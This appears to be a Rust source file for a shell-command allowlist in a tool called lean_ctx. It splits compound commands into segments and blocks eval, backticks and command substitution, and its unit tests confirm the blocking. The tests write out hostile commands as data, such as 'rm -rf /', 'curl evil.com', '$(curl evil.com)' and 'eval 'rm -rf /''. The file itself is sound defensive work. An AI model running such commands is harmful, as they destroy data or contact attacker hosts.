Skip to main content

lean_ctx/core/
shell_allowlist.rs

1//! Shell allowlist with AST-based command parsing.
2//!
3//! Security model (Information Bottleneck principle):
4//! - When allowlist is set: ALL segments of a compound command must be allowed (deny-by-default)
5//! - When empty: all commands pass (backwards-compatible blocklist-only mode)
6//! - Dangerous patterns (subshells, eval, backticks) are blocked in restricted mode
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let allowlist = effective_allowlist();
15    if allowlist.is_empty() {
16        return Ok(());
17    }
18    check_all_segments(command, &allowlist)
19}
20
21fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
22    if allowlist.is_empty() {
23        return Ok(());
24    }
25
26    if has_dangerous_patterns(command) {
27        return Err(format!(
28            "[SHELL ALLOWLIST] Command contains dangerous patterns (eval, backticks, or $(...) substitution) \
29             which are blocked in restricted mode: {command}"
30        ));
31    }
32
33    let segments = extract_all_commands(command);
34    if segments.is_empty() {
35        return Err("[SHELL ALLOWLIST] Empty command".to_string());
36    }
37
38    for seg in &segments {
39        let base = extract_base_from_segment(seg);
40        if base.is_empty() {
41            continue;
42        }
43        if !allowlist.iter().any(|a| a == &base) {
44            return Err(format!(
45                "[SHELL ALLOWLIST] Command segment '{seg}' (base: '{base}') is not allowed. \
46                 All segments must be in the allowlist. Allowed: {}",
47                allowlist.join(", ")
48            ));
49        }
50    }
51    Ok(())
52}
53
54/// Detect dangerous shell patterns that bypass allowlist intent.
55fn has_dangerous_patterns(command: &str) -> bool {
56    let trimmed = command.trim();
57
58    // eval invocation
59    if trimmed.starts_with("eval ") || trimmed.contains("; eval ") || trimmed.contains("&& eval ") {
60        return true;
61    }
62
63    // Backtick command substitution
64    if trimmed.contains('`') {
65        return true;
66    }
67
68    // $() command substitution used as a command (not just in arguments)
69    // We block $() at command position, not inside quoted strings for args
70    if has_command_substitution_at_command_pos(trimmed) {
71        return true;
72    }
73
74    false
75}
76
/// Reports whether `command` contains command substitution `$(...)` or process
/// substitution `<(...)` / `>(...)` anywhere.
///
/// In restricted mode these are rejected in every position, because the nested
/// command runs regardless of where the substitution appears. The scan covers
/// the whole command on purpose, including `NAME=value` prefixes: a command such
/// as `FOO=$(reboot) git status` executes `reboot` even though the visible
/// command is `git`.
///
/// The check is not quote-aware, so a literal `$(` inside single quotes is also
/// rejected; that errs on the side of blocking.
fn has_command_substitution_at_command_pos(command: &str) -> bool {
    // `$(` also covers arithmetic expansion `$((`; `<(` and `>(` are the
    // process-substitution openers used by bash and zsh.
    const SUBSTITUTION_OPENERS: [&str; 3] = ["$(", "<(", ">("];

    SUBSTITUTION_OPENERS
        .into_iter()
        .any(|opener| command.contains(opener))
}
97
98/// Extract ALL command segments from a compound shell command.
99/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
100fn extract_all_commands(command: &str) -> Vec<String> {
101    split_on_operators(command)
102        .into_iter()
103        .map(|s| s.trim().to_string())
104        .filter(|s| !s.is_empty())
105        .collect()
106}
107
/// Split a command string on shell control operators.
///
/// Separators (only outside quotes and outside parentheses): `;`, newline,
/// `&&`, `||`, `|`, `|&` and a single `&` (background). The returned slices are
/// the untrimmed text between separators; a trailing empty piece is not
/// returned, but empty pieces between adjacent separators are.
///
/// Lexing rules applied while scanning:
/// - Single quotes protect everything up to the closing quote.
/// - Inside double quotes a backslash protects the next byte, so `"\\"` closes
///   correctly and `"\""` does not.
/// - Outside quotes a backslash protects the next byte, so `\;`, `\(` and `\"`
///   are literal characters rather than syntax.
/// - `#` at the start of a word begins a comment that runs to the end of the
///   line; its content is never interpreted as quotes or operators.
/// - `&` directly after `<` or `>` is file-descriptor duplication (`2>&1`) and
///   does not split.
///
/// `&>` is deliberately treated as a background `&` followed by `>`, which is
/// how a POSIX `sh` reads it. Under an allowlist this blocks the bash-only form
/// `cmd &>file`; `cmd >file 2>&1` is unaffected.
///
/// NOTE(review): here-documents and ANSI-C quoting (`$'...'`) are not modelled.
fn split_on_operators(command: &str) -> Vec<&str> {
    let bytes = command.as_bytes();
    let len = bytes.len();
    let mut segments = Vec::new();
    let mut start = 0;
    let mut i = 0;
    let mut in_single_quote = false;
    let mut in_double_quote = false;
    let mut paren_depth: u32 = 0;
    // True when the next unquoted byte would begin a new shell word; only then
    // does `#` start a comment.
    let mut at_word_start = true;
    // True when the previous unquoted, unescaped byte was `<` or `>`.
    let mut after_redirect = false;

    while i < len {
        let ch = bytes[i];

        if in_single_quote {
            in_single_quote = ch != b'\'';
            i += 1;
            continue;
        }

        if in_double_quote {
            match ch {
                // Skip the escaped byte so `\"` and `\\` cannot end the string early
                // or keep it open by mistake.
                b'\\' => i += 2,
                b'"' => {
                    in_double_quote = false;
                    i += 1;
                }
                _ => i += 1,
            }
            continue;
        }

        // Snapshot the lexer flags for this byte, then reset them; the arms
        // below re-arm whichever flag applies to the following byte.
        let word_start = at_word_start;
        let redirect_before = after_redirect;
        at_word_start = false;
        after_redirect = false;

        match ch {
            b'\\' => {
                // Backslash-newline is a line continuation: the shell deletes
                // both bytes, so the lexer state carries over unchanged.
                if bytes.get(i + 1).copied() == Some(b'\n') {
                    at_word_start = word_start;
                    after_redirect = redirect_before;
                }
                i += 2;
            }
            b'\'' => {
                in_single_quote = true;
                i += 1;
            }
            b'"' => {
                in_double_quote = true;
                i += 1;
            }
            b'#' if word_start => {
                // Comment: skip to the newline, which is left in place so it is
                // still handled as a separator on the next iteration.
                while i < len && bytes[i] != b'\n' {
                    i += 1;
                }
                at_word_start = true;
            }
            b'(' => {
                paren_depth += 1;
                at_word_start = true;
                i += 1;
            }
            b')' => {
                paren_depth = paren_depth.saturating_sub(1);
                at_word_start = true;
                i += 1;
            }
            b'<' | b'>' => {
                after_redirect = true;
                at_word_start = true;
                i += 1;
            }
            // `>&` / `<&`: part of a redirection, not a control operator.
            b'&' if redirect_before => {
                i += 1;
            }
            b';' | b'\n' | b'&' | b'|' => {
                let width = match (ch, bytes.get(i + 1).copied()) {
                    (b'&', Some(b'&')) | (b'|', Some(b'|' | b'&')) => 2,
                    _ => 1,
                };
                // Operators inside parentheses stay part of the enclosing segment.
                if paren_depth == 0 {
                    segments.push(&command[start..i]);
                    start = i + width;
                }
                i += width;
                at_word_start = true;
            }
            // Only the blanks the shell itself uses to delimit words.
            b' ' | b'\t' => {
                at_word_start = true;
                i += 1;
            }
            _ => i += 1,
        }
    }

    if start < len {
        segments.push(&command[start..]);
    }

    segments
}
191
192/// Extract the base command name from a single segment (no operators).
193fn extract_base_from_segment(segment: &str) -> String {
194    let trimmed = segment.trim();
195    if trimmed.is_empty() {
196        return String::new();
197    }
198
199    let cmd_part = skip_env_assignments(trimmed);
200    if cmd_part.is_empty() {
201        return String::new();
202    }
203
204    // Take first whitespace-delimited token as the command
205    let first_token = cmd_part.split_whitespace().next().unwrap_or("");
206
207    // Strip path prefix: /usr/bin/git -> git
208    first_token
209        .rsplit('/')
210        .next()
211        .unwrap_or(first_token)
212        .to_string()
213}
214
/// Skip leading `NAME=value` environment variable assignments.
///
/// Returns the remainder of `segment` starting at the first word that is not an
/// assignment. When the segment does not start with an assignment it is
/// returned unchanged, including any leading whitespace.
///
/// A word counts as an assignment only when it starts with a valid shell
/// variable name (`[A-Za-z_][A-Za-z0-9_]*`) followed by `=` or `+=`. Its value is
/// scanned with quote and backslash awareness, so `FOO="a git b" reboot` yields
/// `reboot` rather than treating text inside the quoted value as the command.
fn skip_env_assignments(segment: &str) -> &str {
    let mut rest = segment;
    loop {
        let candidate = rest.trim_start();
        match leading_assignment_len(candidate) {
            Some(len) => rest = candidate[len..].trim_start(),
            None => return rest,
        }
    }
}

/// Byte length of the `NAME=value` word at the start of `s`, or `None` when `s`
/// does not begin with an assignment.
fn leading_assignment_len(s: &str) -> Option<usize> {
    let bytes = s.as_bytes();
    let first = *bytes.first()?;
    if !(first.is_ascii_alphabetic() || first == b'_') {
        return None;
    }

    let name_len = bytes
        .iter()
        .take_while(|b| b.is_ascii_alphanumeric() || **b == b'_')
        .count();
    let mut value_start = name_len;
    // `NAME+=value` is the append form of an assignment.
    if bytes.get(value_start) == Some(&b'+') {
        value_start += 1;
    }
    if bytes.get(value_start) != Some(&b'=') {
        return None;
    }
    value_start += 1;

    let mut in_single = false;
    let mut in_double = false;
    let mut chars = s[value_start..].char_indices();
    while let Some((offset, ch)) = chars.next() {
        match ch {
            '\'' if !in_double => in_single = !in_single,
            '"' if !in_single => in_double = !in_double,
            // A backslash protects the next character, except inside single quotes.
            '\\' if !in_single => {
                chars.next();
            }
            // Only the shell's own blanks end a word; other whitespace-like
            // characters (e.g. `\r`, NBSP) are ordinary value characters.
            ' ' | '\t' | '\n' if !in_single && !in_double => {
                return Some(value_start + offset);
            }
            _ => {}
        }
    }
    // Value runs to the end of the segment (possibly with an unterminated quote).
    Some(s.len())
}
237
238fn effective_allowlist() -> Vec<String> {
239    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
240        return env_val
241            .split(',')
242            .map(|s| s.trim().to_string())
243            .filter(|s| !s.is_empty())
244            .collect();
245    }
246    crate::core::config::Config::load().shell_allowlist
247}
248
249// Legacy compat: single-segment extraction (used by other callers)
250pub fn extract_base_command(command: &str) -> String {
251    let first_seg = split_on_operators(command)
252        .into_iter()
253        .next()
254        .unwrap_or(command);
255    extract_base_from_segment(first_seg)
256}
257
#[cfg(test)]
mod tests {
    use super::*;

    /// Asserts that the legacy extractor reports `expected` for `command`.
    fn assert_base(command: &str, expected: &str) {
        assert_eq!(extract_base_command(command), expected);
    }

    /// Builds an owned allowlist from string literals.
    fn allow(cmds: &[&str]) -> Vec<String> {
        cmds.iter().map(|cmd| (*cmd).to_owned()).collect()
    }

    /// True when `command` passes the segment check against `list`.
    fn permits(list: &[String], command: &str) -> bool {
        check_all_segments(command, list).is_ok()
    }

    // --- extract_base_command tests (legacy compat) ---

    #[test]
    fn extract_simple_command() {
        assert_base("git status", "git");
    }

    #[test]
    fn extract_with_path() {
        assert_base("/usr/bin/git log", "git");
    }

    #[test]
    fn extract_with_env_assignment() {
        assert_base("LANG=en_US git log", "git");
    }

    #[test]
    fn extract_chained_commands() {
        assert_base("cd /tmp && ls -la", "cd");
    }

    #[test]
    fn extract_piped_command() {
        assert_base("grep foo | wc -l", "grep");
    }

    #[test]
    fn extract_semicolon_chain() {
        assert_base("echo hello; rm -rf /", "echo");
    }

    #[test]
    fn extract_empty_command() {
        assert_base("", "");
    }

    #[test]
    fn extract_whitespace_only() {
        assert_base("   ", "");
    }

    #[test]
    fn extract_multiple_env_vars() {
        assert_base("FOO=bar BAZ=qux cargo test", "cargo");
    }

    // --- All-segments validation tests ---

    #[test]
    fn allowlist_empty_always_passes() {
        assert!(permits(&[], "anything"));
    }

    #[test]
    fn allowlist_blocks_unlisted() {
        let list = allow(&["git", "cargo"]);
        let message = check_all_segments("npm install", &list)
            .expect_err("npm is not on the allowlist");
        assert!(message.contains("npm"));
    }

    #[test]
    fn allowlist_allows_listed() {
        let list = allow(&["git", "cargo", "npm"]);
        for command in ["git status", "cargo test --release", "npm run build"] {
            assert!(permits(&list, command));
        }
    }

    #[test]
    fn allowlist_allows_full_path() {
        assert!(permits(&allow(&["git"]), "/usr/bin/git status"));
    }

    #[test]
    fn allowlist_allows_with_env_prefix() {
        assert!(permits(&allow(&["git"]), "LANG=C git log"));
    }

    #[test]
    fn allowlist_blocks_similar_names() {
        assert!(!permits(&allow(&["git"]), "gitk --all"));
    }

    // --- Multi-segment validation (the critical security improvement) ---

    #[test]
    fn all_segments_must_be_allowed_chain() {
        let list = allow(&["git", "cargo"]);
        // Every segment allowlisted: accepted.
        assert!(permits(&list, "git status && cargo test"));
        // Trailing segment not allowlisted: rejected.
        assert!(!permits(&list, "git status && rm -rf /"));
    }

    #[test]
    fn all_segments_must_be_allowed_pipe() {
        let list = allow(&["git", "grep", "wc"]);
        assert!(permits(&list, "git log | grep fix | wc -l"));
        // `cat` is missing from the allowlist.
        assert!(!permits(&list, "git log | cat"));
    }

    #[test]
    fn all_segments_must_be_allowed_semicolon() {
        let list = allow(&["echo", "ls"]);
        assert!(permits(&list, "echo hello; ls -la"));
        assert!(!permits(&list, "echo hello; rm -rf /"));
    }

    #[test]
    fn all_segments_must_be_allowed_or() {
        let list = allow(&["git", "echo"]);
        assert!(permits(&list, "git pull || echo failed"));
        assert!(!permits(&list, "git pull || curl evil.com"));
    }

    // --- Dangerous pattern detection ---

    #[test]
    fn blocks_eval() {
        // Listing `eval` does not lift the ban on the pattern itself.
        let list = allow(&["echo", "eval"]);
        assert!(!permits(&list, "eval 'rm -rf /'"));
    }

    #[test]
    fn blocks_backticks() {
        assert!(!permits(&allow(&["echo"]), "echo `whoami`"));
    }

    #[test]
    fn blocks_command_substitution_at_command_pos() {
        assert!(!permits(&allow(&["echo"]), "$(curl evil.com)"));
    }

    #[test]
    fn blocks_dollar_paren_in_all_positions() {
        // With an allowlist in force, `$()` is rejected in argument position
        // too, since it runs arbitrary code wherever it appears.
        let list = allow(&["echo"]);
        assert!(!permits(&list, "echo $(whoami)"));
        // The same command without `$()` is accepted.
        assert!(permits(&list, "echo hello"));
    }

    // --- Quote handling ---

    #[test]
    fn respects_single_quotes() {
        // The semicolon sits inside quotes, so there is a single segment.
        assert!(permits(&allow(&["echo"]), "echo 'hello; world'"));
    }

    #[test]
    fn respects_double_quotes() {
        assert!(permits(&allow(&["echo"]), "echo \"hello && world\""));
    }

    // --- split_on_operators ---

    #[test]
    fn split_simple_pipe() {
        assert_eq!(split_on_operators("a | b"), vec!["a ", " b"]);
    }

    #[test]
    fn split_complex_chain() {
        assert_eq!(split_on_operators("a && b || c; d | e").len(), 5);
    }

    #[test]
    fn split_preserves_quoted_operators() {
        assert_eq!(split_on_operators("echo 'a && b' | grep x").len(), 2);
    }
}